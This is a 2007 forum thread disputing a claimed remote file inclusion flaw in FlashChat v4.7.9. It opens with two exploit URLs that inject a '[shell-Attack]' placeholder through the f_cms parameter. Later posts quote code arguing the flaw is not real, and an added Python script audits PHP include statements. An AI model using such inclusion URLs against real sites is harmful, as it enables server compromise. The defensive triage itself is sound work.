Gonzalez Posted May 28, 2007

Discovered By Hasadya Raed
Contact : RaeD (at) BsdMail (dot) Com [email concealed]
--------------------------
Script : FlashChat_v479
Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html
--------------------------
B.Files :
connection.php > Require_once($f_cms);
common.php > Require_once($f_cms);
--------------------------
Exploits :
http://www.Victim.com/chat/incclasses/connection.php?f_cms=[shell-Attack]
http://www.Victim.com/chat/inc/common.php?f_cms=[shell-Attack]
kw3rln Posted May 28, 2007

The code, in common.php:

    //if ($GLOBALS['fc_config']['CMSsystem'] == 'phpBB2CMS') {
        //---CMS
        // Path is built from the INC_DIR constant and the configured CMS name
        $f_cms = INC_DIR . 'cmses/' . $GLOBALS['fc_config']['CMSsystem'] . '.php';
        if( !file_exists($f_cms) || !is_file($f_cms) )
            require_once(INC_DIR . 'cmses/statelessCMS.php'); //free for all users
        else
            require_once( $f_cms );
        //---end CMS
    //}

f_cms is declared! It's not vulnerable, and in connection.php that variable doesn't exist.
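The check kw3rln describes in the post above (is the variable handed to require_once assigned before the include runs?) can be scripted for triaging reports of this kind. The Python below is an added example, not part of the thread or of FlashChat; the function names and the second and third sample snippets are constructed, and the scan is regex-based and file-local, so an assignment made in another file is not seen.

```python
import re

# Keep string literals (group 1); drop /* */, // and # comments.
TOKEN_RE = re.compile(r"""('(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*")|/\*.*?\*/|(?://|#)[^\n]*""", re.S)
# include/require whose whole argument is one bare variable.
INCLUDE_RE = re.compile(r"\b(?:require|include)(?:_once)?\s*\(?\s*\$(\w+)\s*\)?\s*;", re.I)
REQUEST_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")

def strip_comments(src):
    # Block comments are replaced by their newlines so line numbers stay valid.
    return TOKEN_RE.sub(lambda m: m.group(1) or "\n" * m.group(0).count("\n"), src)

def audit_includes(src):
    """Return (line, variable, status) for each include of a bare variable."""
    code = strip_comments(src)
    findings = []
    for inc in INCLUDE_RE.finditer(code):
        var = inc.group(1)
        assign_re = re.compile(r"\$" + re.escape(var) + r"\s*=(?![=>])([^;]*);")
        prior = list(assign_re.finditer(code, 0, inc.start()))
        if not prior:
            status = "unassigned"        # only a global set elsewhere can fill it
        elif REQUEST_RE.search(prior[-1].group(1)):
            status = "request-derived"   # last assignment reads request input
        else:
            status = "assigned"          # set in this file before the include
        findings.append((code.count("\n", 0, inc.start()) + 1, var, status))
    return findings

# Snippet as posted in the thread (common.php).
SAMPLE_POSTED = r"""<?php
//if ($GLOBALS['fc_config']['CMSsystem'] == 'phpBB2CMS') {
$f_cms = INC_DIR . 'cmses/' . $GLOBALS['fc_config']['CMSsystem'] . '.php';
if( !file_exists($f_cms) || !is_file($f_cms) )
    require_once(INC_DIR . 'cmses/statelessCMS.php');//free for all users
else
    require_once( $f_cms );
//}
"""
# Constructed counter-cases, not taken from FlashChat.
SAMPLE_UNSET = "<?php\nrequire_once($f_cms);\n"
SAMPLE_REQUEST = "<?php\n$page = $_GET['page'];\ninclude($page);\n"

if __name__ == "__main__":
    for name in ("SAMPLE_POSTED", "SAMPLE_UNSET", "SAMPLE_REQUEST"):
        print(name, audit_includes(globals()[name]))
```

An "unassigned" result is the case worth a manual look: with PHP's register_globals enabled, a request parameter of the same name would populate the variable.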
Guest flama Posted May 28, 2007

maybe you downloaded the patched version .... on the other hand, maybe the guy who disclosed it is a complete idiot
kw3rln Posted May 29, 2007

I took the version the guy posted!
Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html